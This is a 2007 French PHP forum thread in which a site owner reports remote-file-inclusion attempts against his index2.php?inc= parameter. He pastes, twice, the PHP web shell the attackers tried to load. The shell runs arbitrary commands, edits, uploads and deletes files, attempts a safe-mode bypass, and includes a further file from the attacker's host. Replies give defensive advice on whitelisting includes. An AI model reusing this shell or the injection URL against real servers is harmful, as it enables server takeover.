Question piratage ?

Eléphant du PHP | 199 Messages

29 mars 2007, 12:44

bonjour,

je viens de voir que sur mon site il y a plusieurs adresse ip qui essaye d'inclure dans mes pages une page d'un autre site.

en gros mes page fonctionne par includes ex: index2.php?inc=ma-page
et la je vois que ces ip essaye d'ouvrir : /index2.php?inc=http://globizgroup.com/.img/dog.c?

J'ai telechargé sur ce site "globizgroup.com" la page qu'il essaye d'inclure
voila le code :

Code : Tout sélectionner

"; // End JavaScript /* Functions */ function cmd($CMDs) { $CMD[1] = ''; exec($CMDs, $CMD[1]); if (empty($CMD[1])) { $CMD[1] = shell_exec($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = passthru($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = system($CMDs); } elseif (empty($CMD[1])) { $handle = popen($CMDs, 'r'); while(!feof($handle)) { $CMD[1][] .= fgets($handle); } pclose($handle); } return $CMD[1]; } if (@$_GET['chdir']) { $chdir = $_GET['chdir']; } else { $chdir = getcwd()."/"; } if (@chdir("$chdir")) { $msg = "Entrance in the directory, OK!"; } else { $msg = "Error to enters it in the directory!"; $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); } $chdir = str_replace(chr(92), chr(47), $chdir); if (@$_GET['action'] == 'upload') { $uploaddir = $chdir; $uploadfile = $uploaddir. $_FILES['userfile']['name']; if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) { $msg = "{$_FILES['userfile']['name']}, the archive is validates and was loaded successfully."; } else { $msg = "Error when copying archive."; } } elseif (@$_GET['action'] == 'mkdir') { $newdir = $_GET['newdir']; if (@mkdir("$chdir"."$newdir")) { $msg = "{$newdir}, directory created successfully."; } else { $msg = "Error to it creates directory."; } } elseif (@$_GET['action'] == 'newfile') { $newfile = $_GET['newfile']; if (@touch("$chdir"."$newfile")) { $msg = "{$newfile}, created successfully!"; } else { $msg = "Error to tries it creates archive."; } } elseif (@$_GET['action'] == 'del') { $file = $_GET['file']; $type = $_GET['type']; if ($type == 'file') { if (@unlink("$chdir"."$file")) { $msg = "{$file}, successfully excluded archive!"; } else { $msg = "Error to it I excluded archive!"; } } elseif ($type == 'dir') { if (@rmdir("$chdir"."$file")) { $msg = "{$file}, successfully excluded directory!"; } else { $msg = "Error to it I excluded directory!"; } } } elseif (@$_GET['action'] == 'chmod') { $file = $chdir.$_GET['file']; $chmod = $_GET['chmod']; if (@chmod ("$file", $chmod)) { $msg = "Chmod of {$_GET['file']} moved for $chmod successfully."; } else { $msg = 'Error when moving chmod.'; } } elseif (@$_GET['action'] == 'rename') { $file = $_GET['file']; $newname = $_GET['newname']; if (@rename("$chdir"."$file", "$chdir"."$newname")) { $msg = "Archive {$file} named for {$newname} successfully!"; } else { $msg = "Error to it nominates archive."; } } elseif (@$_GET['action'] == 'copy') { $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; if (@copy("$file", "$copy")) { $msg = "{$file}, copied for {$copy} successfully!"; } else { $msg = "Error when copying {$file} for {$copy}"; } } /* Parte Atualiza 02:48 12/2/2006 */ elseif (@$_GET['action'] == 'cmd') { if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } $cmd = stripslashes(trim($cmd)); $result_arr = cmd($cmd); $afim = count($result_arr); $acom = 0; $msg = ''; $msg .= " Results: ".$cmd." "; if ($result_arr) { while ($acom <= $afim) { $msg .= " ".@$result_arr[$acom]." "; $acom++; } } else { $msg .= " Erro ao executar comando. "; } } elseif (@$_GET['action'] == 'safemode') { if (@!extension_loaded('shmop')) { echo "Loading... module "; if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { @dl('php_shmop.dll'); } else { @dl('shmop.so'); } } if (@extension_loaded('shmop')) { echo "Module: shmop loaded! "; $shm_id = @shmop_open(0xff2, "c", 0644, 100); if (!$shm_id) { echo "Couldn't create shared memory segment\\n"; } $data="\\x00"; $offset=-3842685; $shm_bytes_written = @shmop_write($shm_id, $data, $offset); if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\\n"; } if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } echo passthru("id"); shmop_close($shm_id); } else { echo "Module: shmop not loaded! "; } } elseif (@$_GET['action'] == 'zipen') { $file = $_GET['file']; $zip = @zip_open("$chdir"."$file"); $msg = ''; if ($zip) { while ($zip_entry = zip_read($zip)) { $msg .= "Name: " . zip_entry_name($zip_entry) . "\\n"; $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\\n"; $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\\n"; $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\n"; if (zip_entry_open($zip, $zip_entry, "r")) { echo "File Contents:\\n"; $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); echo "$buf\\n"; zip_entry_close($zip_entry); } echo "\\n"; } zip_close($zip); } } elseif (@$_GET['action'] == 'edit') { $file = $_GET['file']; $conteudo = ''; $filename = "$chdir"."$file"; $conteudo = @file_get_contents($filename); $conteudo = htmlspecialchars($conteudo); $back = $_SERVER['HTTP_REFERER']; echo " Editing {$file} ... "; echo ""; echo ""; echo ""; echo " "; echo " "; echo " "; echo " "; print "{$conteudo} "; echo " "; echo " "; echo " "; echo " "; echo " "; } elseif (@$_GET['action'] == 'save') { $filename = "$chdir".$_GET['file']; $somecontent = $_POST['S1']; $somecontent = stripslashes(trim($somecontent)); if (is_writable($filename)) { @$handle = fopen ($filename, "w"); @$fw = fwrite($handle, $somecontent); @fclose($handle); if ($handle && $fw) { $msg = "{$_GET['file']}, edited successfully!"; } } else { $msg = "{$_GET['file']}, cannot be written!"; } } // Informa��es $cmdget = ''; if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } $cmdget = htmlspecialchars($cmdget); function asdads() { $asdads = ''; if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } return $asdads; } echo " "; echo " "; echo " Informa��es "; echo ""; echo " "; echo ""; echo ""; echo ""; echo " "; echo ""; echo ""; echo ""; echo " "; echo ""; echo ""; if (strtoupper(substr($OS, 0,3) != 'WIN')) { $Methods = asdads(); if ($Methods == '') { $Methods = "???"; } echo ""; echo " "; echo ""; echo ""; } echo ""; echo " "; echo ""; echo ""; echo ""; echo " "; echo ""; echo ""; echo " "; echo " "; echo " Sistema: {$OS} "; echo " Uname: {$UNAME} "; echo " PHP: {$PHPv}, safe mode: {$SafeMode} "; echo " Methods: {$Methods} "; echo " Ip: {$IpServer} "; echo " Command: "; echo " "; // Dir echo " "; echo " "; if (is_writable("$chdir")) { if (strtoupper(substr($OS, 0,3) == 'WIN')) { echo " Dir YES: {$chdir} - [New Dir] [New File] [Remote Access] "; } else { echo " Dir YES: {$chdir} - [New Dir] [New File] [BackTool] "; } } else { if (strtoupper(substr($OS, 0,3) == 'WIN')) { echo " Dir NO: {$chdir} - [New Dir] [New File] [Remote Access] "; } else { echo " Dir NO: {$chdir} - [New Dir] [New File] [BackTool] "; } } if (@!$handle = opendir("$chdir")) { echo " I could not enters in the directory, click here! for return to the original directory! "; } else { echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; } else { echo " $msg"; } echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; $colorn = 0; while (false !== ($file = readdir($handle))) { if ($file != '.') { if ($colorn == 0) { $color = "style=\"background-color: #FFCC66\""; } elseif ($colorn == 1) { $color = "style=\"background-color: #C0C0C0\""; } if (@is_dir("$chdir"."$file")) { $file = $file.'/'; $mode = 'chdir'; } else { $mode = 'edit'; } if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { $chdir .= '/'; } if ($file == '../') { $lenpath = strlen($chdir); $baras = 0; for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } $chdir_ = explode("/", $chdir); $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); } $perms = @fileperms ("$chdir"."$file"); if ($perms == '') { $perms = '???'; } $size = @filesize ("$chdir"."$file"); $size = $size / 1024; $size = explode(".", $size); if (@$size[1] != '') { $size = $size[0].'.'.@substr("$size[1]", 0, 2); } else { $size = $size[0]; } if ($size == 0) { if ($mode == 'chdir') { $size = '???'; } } echo ""; echo ""; if (@is_writable ("$chdir"."$file")) { if ($mode == 'chdir') { if ($file == '../') { echo ""; } else { echo ""; } } else { if (is_readable("$chdir"."$file")) { echo ""; } else { echo ""; } } } else { if ($mode == 'chdir') { if ($file == '../') { echo ""; } else { echo ""; } } else { if (@is_readable("$chdir"."$file")) { echo ""; } else { echo ""; } } } echo ""; if ($mode == 'edit') { echo ""; } else { echo ""; } echo ""; if ($colorn == 0) { $colorn = 1; } elseif ($colorn == 1) { $colorn = 0; } } } closedir($handle); } include 'http://globizgroup.com/.img/solo'; ?> "; echo " Upload:"; echo " "; echo " "; if (@!$msg) { echo " Messages Perms File Size Commands $perms $file $file $file $file $file $file $file $file $size KB [Rename] [Del] [Chmod] [Copy] [Rename] [Del] [Chmod] [Copy] v
est ce que quelqu'un a une idée de ce que la personne essaye de faire ?
est ce une tentative de piratage ?
qu'est ce que je risque, qu'est ce que je peut faire?

merci d'avance

Mammouth du PHP | 558 Messages

29 mars 2007, 13:01

tu peut deja proteger toute les porte d'acces de ton site (formulaire) en protegenant egalement les champs caché

29 mars 2007, 13:04

peut tu expliquer un peu plus car la je vois pas du tout ce que tu veut dir...

merci

Eléphant du PHP | 445 Messages

29 mars 2007, 13:15

Bonjour,

Pour te protéger, il faut savoir qu'il est fortement déconseillé d'inclure un fichier contenu dans une variable, du style
include($ma_page);
Utilises par exemple cette syntaxe pour ne pas qu'une page d'un site extérieur ne puisse être chargée :
switch ($ma_page)  {
  case 'index' :
    include('./index.php');
  case 'piratage' : 
    include('./piratage.php');
  default :
    include('./erreur.php');
}
Pour ce qui est de l'explication du code que tente d'inclure la personne, je n'ai pas eu le temps de lire encore, donc je ne peux pas vraiment en dire plus ^^
LLDC
Ulti

29 mars 2007, 13:57

en faite le systeme que j'utilise c'est :

../includes/$variable.php

donc je pense que a partir du moment ou il essaye de mettre une page d'un autre site c'est mort...
je me trompe ?

Mammouth du PHP | 1511 Messages

29 mars 2007, 17:45

Je pense que oui, mais enfin bon, pense a proteger ton script avec un array ou un switch ;)

Mammouth du PHP | 558 Messages

31 mars 2007, 12:04

il semblerais que quelqun essaye soit de supprimer ton script ou de te le voler j'ai vue des chose un peu bizzare, faire des chmod, supprimez ou renomer des fichier, telecharger les fichiers et un .txt a ete creer nomer cs.txt...
je l'ai testez en local et j'ai supprimer tous ses fichiers mais attention ne t'amuse pas a cela si tu ne connait pas ton pc sur le bout des doigts
la page testez est:http://globizgroup.com/.img/dog.c?

Eléphant du PHP | 216 Messages

31 mars 2007, 14:04

bonjour,

je viens de voir que sur mon site il y a plusieurs adresse ip qui essaye d'inclure dans mes pages une page d'un autre site.

en gros mes page fonctionne par includes ex: index2.php?inc=ma-page
et la je vois que ces ip essaye d'ouvrir : /index2.php?inc=http://globizgroup.com/.img/dog.c?

J'ai telechargé sur ce site "globizgroup.com" la page qu'il essaye d'inclure
voila le code :

Code : Tout sélectionner

"; // End JavaScript /* Functions */ function cmd($CMDs) { $CMD[1] = ''; exec($CMDs, $CMD[1]); if (empty($CMD[1])) { $CMD[1] = shell_exec($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = passthru($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = system($CMDs); } elseif (empty($CMD[1])) { $handle = popen($CMDs, 'r'); while(!feof($handle)) { $CMD[1][] .= fgets($handle); } pclose($handle); } return $CMD[1]; } if (@$_GET['chdir']) { $chdir = $_GET['chdir']; } else { $chdir = getcwd()."/"; } if (@chdir("$chdir")) { $msg = "Entrance in the directory, OK!"; } else { $msg = "Error to enters it in the directory!"; $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); } $chdir = str_replace(chr(92), chr(47), $chdir); if (@$_GET['action'] == 'upload') { $uploaddir = $chdir; $uploadfile = $uploaddir. $_FILES['userfile']['name']; if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) { $msg = "{$_FILES['userfile']['name']}, the archive is validates and was loaded successfully."; } else { $msg = "Error when copying archive."; } } elseif (@$_GET['action'] == 'mkdir') { $newdir = $_GET['newdir']; if (@mkdir("$chdir"."$newdir")) { $msg = "{$newdir}, directory created successfully."; } else { $msg = "Error to it creates directory."; } } elseif (@$_GET['action'] == 'newfile') { $newfile = $_GET['newfile']; if (@touch("$chdir"."$newfile")) { $msg = "{$newfile}, created successfully!"; } else { $msg = "Error to tries it creates archive."; } } elseif (@$_GET['action'] == 'del') { $file = $_GET['file']; $type = $_GET['type']; if ($type == 'file') { if (@unlink("$chdir"."$file")) { $msg = "{$file}, successfully excluded archive!"; } else { $msg = "Error to it I excluded archive!"; } } elseif ($type == 'dir') { if (@rmdir("$chdir"."$file")) { $msg = "{$file}, successfully excluded directory!"; } else { $msg = "Error to it I excluded directory!"; } } } elseif (@$_GET['action'] == 'chmod') { $file = $chdir.$_GET['file']; $chmod = $_GET['chmod']; if (@chmod ("$file", $chmod)) { $msg = "Chmod of {$_GET['file']} moved for $chmod successfully."; } else { $msg = 'Error when moving chmod.'; } } elseif (@$_GET['action'] == 'rename') { $file = $_GET['file']; $newname = $_GET['newname']; if (@rename("$chdir"."$file", "$chdir"."$newname")) { $msg = "Archive {$file} named for {$newname} successfully!"; } else { $msg = "Error to it nominates archive."; } } elseif (@$_GET['action'] == 'copy') { $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; if (@copy("$file", "$copy")) { $msg = "{$file}, copied for {$copy} successfully!"; } else { $msg = "Error when copying {$file} for {$copy}"; } } /* Parte Atualiza 02:48 12/2/2006 */ elseif (@$_GET['action'] == 'cmd') { if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } $cmd = stripslashes(trim($cmd)); $result_arr = cmd($cmd); $afim = count($result_arr); $acom = 0; $msg = ''; $msg .= " Results: ".$cmd." "; if ($result_arr) { while ($acom <= $afim) { $msg .= " ".@$result_arr[$acom]." "; $acom++; } } else { $msg .= " Erro ao executar comando. "; } } elseif (@$_GET['action'] == 'safemode') { if (@!extension_loaded('shmop')) { echo "Loading... module "; if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { @dl('php_shmop.dll'); } else { @dl('shmop.so'); } } if (@extension_loaded('shmop')) { echo "Module: shmop loaded! "; $shm_id = @shmop_open(0xff2, "c", 0644, 100); if (!$shm_id) { echo "Couldn't create shared memory segment\\n"; } $data="\\x00"; $offset=-3842685; $shm_bytes_written = @shmop_write($shm_id, $data, $offset); if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\\n"; } if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } echo passthru("id"); shmop_close($shm_id); } else { echo "Module: shmop not loaded! "; } } elseif (@$_GET['action'] == 'zipen') { $file = $_GET['file']; $zip = @zip_open("$chdir"."$file"); $msg = ''; if ($zip) { while ($zip_entry = zip_read($zip)) { $msg .= "Name: " . zip_entry_name($zip_entry) . "\\n"; $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\\n"; $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\\n"; $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\n"; if (zip_entry_open($zip, $zip_entry, "r")) { echo "File Contents:\\n"; $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); echo "$buf\\n"; zip_entry_close($zip_entry); } echo "\\n"; } zip_close($zip); } } elseif (@$_GET['action'] == 'edit') { $file = $_GET['file']; $conteudo = ''; $filename = "$chdir"."$file"; $conteudo = @file_get_contents($filename); $conteudo = htmlspecialchars($conteudo); $back = $_SERVER['HTTP_REFERER']; echo " Editing {$file} ... "; echo ""; echo ""; echo ""; echo " "; echo " "; echo " "; echo " "; print "{$conteudo} "; echo " "; echo " "; echo " "; echo " "; echo " "; } elseif (@$_GET['action'] == 'save') { $filename = "$chdir".$_GET['file']; $somecontent = $_POST['S1']; $somecontent = stripslashes(trim($somecontent)); if (is_writable($filename)) { @$handle = fopen ($filename, "w"); @$fw = fwrite($handle, $somecontent); @fclose($handle); if ($handle && $fw) { $msg = "{$_GET['file']}, edited successfully!"; } } else { $msg = "{$_GET['file']}, cannot be written!"; } } // Informa��es $cmdget = ''; if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } $cmdget = htmlspecialchars($cmdget); function asdads() { $asdads = ''; if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } return $asdads; } echo " "; echo " "; echo " Informa��es "; echo ""; echo " "; echo ""; echo ""; echo ""; echo " "; echo ""; echo ""; echo ""; echo " "; echo ""; echo ""; if (strtoupper(substr($OS, 0,3) != 'WIN')) { $Methods = asdads(); if ($Methods == '') { $Methods = "???"; } echo ""; echo " "; echo ""; echo ""; } echo ""; echo " "; echo ""; echo ""; echo ""; echo " "; echo ""; echo ""; echo " "; echo " "; echo " Sistema: {$OS} "; echo " Uname: {$UNAME} "; echo " PHP: {$PHPv}, safe mode: {$SafeMode} "; echo " Methods: {$Methods} "; echo " Ip: {$IpServer} "; echo " Command: "; echo " "; // Dir echo " "; echo " "; if (is_writable("$chdir")) { if (strtoupper(substr($OS, 0,3) == 'WIN')) { echo " Dir YES: {$chdir} - [New Dir] [New File] [Remote Access] "; } else { echo " Dir YES: {$chdir} - [New Dir] [New File] [BackTool] "; } } else { if (strtoupper(substr($OS, 0,3) == 'WIN')) { echo " Dir NO: {$chdir} - [New Dir] [New File] [Remote Access] "; } else { echo " Dir NO: {$chdir} - [New Dir] [New File] [BackTool] "; } } if (@!$handle = opendir("$chdir")) { echo " I could not enters in the directory, click here! for return to the original directory! "; } else { echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; } else { echo " $msg"; } echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; $colorn = 0; while (false !== ($file = readdir($handle))) { if ($file != '.') { if ($colorn == 0) { $color = "style="background-color: #FFCC66""; } elseif ($colorn == 1) { $color = "style="background-color: #C0C0C0""; } if (@is_dir("$chdir"."$file")) { $file = $file.'/'; $mode = 'chdir'; } else { $mode = 'edit'; } if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { $chdir .= '/'; } if ($file == '../') { $lenpath = strlen($chdir); $baras = 0; for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } $chdir_ = explode("/", $chdir); $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); } $perms = @fileperms ("$chdir"."$file"); if ($perms == '') { $perms = '???'; } $size = @filesize ("$chdir"."$file"); $size = $size / 1024; $size = explode(".", $size); if (@$size[1] != '') { $size = $size[0].'.'.@substr("$size[1]", 0, 2); } else { $size = $size[0]; } if ($size == 0) { if ($mode == 'chdir') { $size = '???'; } } echo ""; echo ""; if (@is_writable ("$chdir"."$file")) { if ($mode == 'chdir') { if ($file == '../') { echo ""; } else { echo ""; } } else { if (is_readable("$chdir"."$file")) { echo ""; } else { echo ""; } } } else { if ($mode == 'chdir') { if ($file == '../') { echo ""; } else { echo ""; } } else { if (@is_readable("$chdir"."$file")) { echo ""; } else { echo ""; } } } echo ""; if ($mode == 'edit') { echo ""; } else { echo ""; } echo ""; if ($colorn == 0) { $colorn = 1; } elseif ($colorn == 1) { $colorn = 0; } } } closedir($handle); } include 'http://globizgroup.com/.img/solo'; ?> "; echo " Upload:"; echo " "; echo " "; if (@!$msg) { echo " Messages Perms File Size Commands $perms $file $file $file $file $file $file $file $file $size KB [Rename] [Del] [Chmod] [Copy] [Rename] [Del] [Chmod] [Copy] v
est ce que quelqu'un a une idée de ce que la personne essaye de faire ?
est ce une tentative de piratage ?
qu'est ce que je risque, qu'est ce que je peut faire?

merci d'avance
Au lieu de passer le lien que tu veux inclure par URL, pourquoi n'utilises tu pas les sessions?

01 avr. 2007, 13:42

utiliser les session je vois pas ce que tu veux dir...